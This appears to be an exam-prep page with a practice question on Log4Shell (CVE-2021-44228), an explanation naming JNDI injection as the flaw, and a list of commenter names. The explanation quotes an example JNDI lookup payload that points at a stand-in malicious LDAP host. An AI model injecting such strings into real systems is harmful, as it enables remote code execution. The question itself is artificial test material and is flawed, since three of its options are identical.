In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?
The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.
Edwin
2 months agoBeckie
2 months agoErnest
2 months agoCristy
3 months agoLea
3 months agoJoni
3 months agoColby
3 months agoGregoria
4 months agoMarti
4 months agoJoye
4 months agoRory
4 months agoNoah
4 months agoXochitl
5 months agoRosita
5 months agoMichael
7 months agoRonald
7 months agoAhmed
7 months agoKami
5 months agoJennifer
6 months agoMarguerita
6 months agoCarmela
7 months agoSanda
8 months agoBettyann
8 months agoLonny
6 months agoWava
7 months agoAmie
7 months agoMarva
8 months agoMerissa
8 months agoReta
7 months agoFausto
7 months agoMing
7 months agoLouvenia
8 months ago